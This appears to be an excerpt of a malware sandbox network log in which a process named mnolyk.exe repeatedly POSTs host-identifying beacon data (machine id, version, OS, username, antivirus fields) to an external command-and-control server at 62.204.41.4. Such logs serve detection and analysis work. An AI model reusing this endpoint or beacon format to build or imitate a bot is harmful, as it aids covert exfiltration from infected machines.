                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 276 | Source IP: 192.168.2.3 | Source Port: 49978 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:36.743998051 CET | kBytes transferred: 476 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:36.808079958 CET | kBytes transferred: 477 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 277 | Source IP: 192.168.2.3 | Source Port: 49979 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:36.980540037 CET | kBytes transferred: 477 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:37.043481112 CET | kBytes transferred: 478 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 278 | Source IP: 192.168.2.3 | Source Port: 49980 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:37.216068983 CET | kBytes transferred: 478 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:37.279519081 CET | kBytes transferred: 479 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 279 | Source IP: 192.168.2.3 | Source Port: 49981 | Destination IP: 62.204.41.4 | Destination Port: 80 | Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:32:37.449608088 CET | kBytes transferred: 479 | Direction: OUT | Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:32:37.512573004 CET | kBytes transferred: 480 | Direction: IN | Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    28 | 192.168.2.3 | 49730 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:23.623023987 CET | 229 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:23.688044071 CET | 229 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    280 | 192.168.2.3 | 49982 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:37.682518959 CET | 480 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:37.745387077 CET | 481 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    281 | 192.168.2.3 | 49983 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:37.924287081 CET | 481 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:37.988426924 CET | 482 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    282 | 192.168.2.3 | 49984 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:38.166013956 CET | 482 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:38.232606888 CET | 483 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    283 | 192.168.2.3 | 49985 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:38.403501034 CET | 483 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:38.467078924 CET | 484 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    284 | 192.168.2.3 | 49986 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:38.636974096 CET | 484 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:38.702825069 CET | 485 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    285 | 192.168.2.3 | 49987 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:38.868567944 CET | 485 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:38.931410074 CET | 486 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    286 | 192.168.2.3 | 49988 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:39.106972933 CET | 486 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:39.173105001 CET | 487 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    287 | 192.168.2.3 | 49989 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:39.351030111 CET | 487 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:39.415781975 CET | 488 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    288 | 192.168.2.3 | 49990 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:39.589080095 CET | 488 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:39.652473927 CET | 488 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    289 | 192.168.2.3 | 49991 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:39.825639009 CET | 489 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:39.888402939 CET | 489 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    29 | 192.168.2.3 | 49731 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:23.865412951 CET | 230 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:23.927287102 CET | 230 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    290 | 192.168.2.3 | 49992 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:40.063951015 CET | 490 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:40.132488966 CET | 490 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    291 | 192.168.2.3 | 49993 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:40.309536934 CET | 491 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:40.375819921 CET | 491 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:32:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    292 | 192.168.2.3 | 49994 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:32:40.570822954 CET | 492 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:32:40.634799957 CET | 492 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
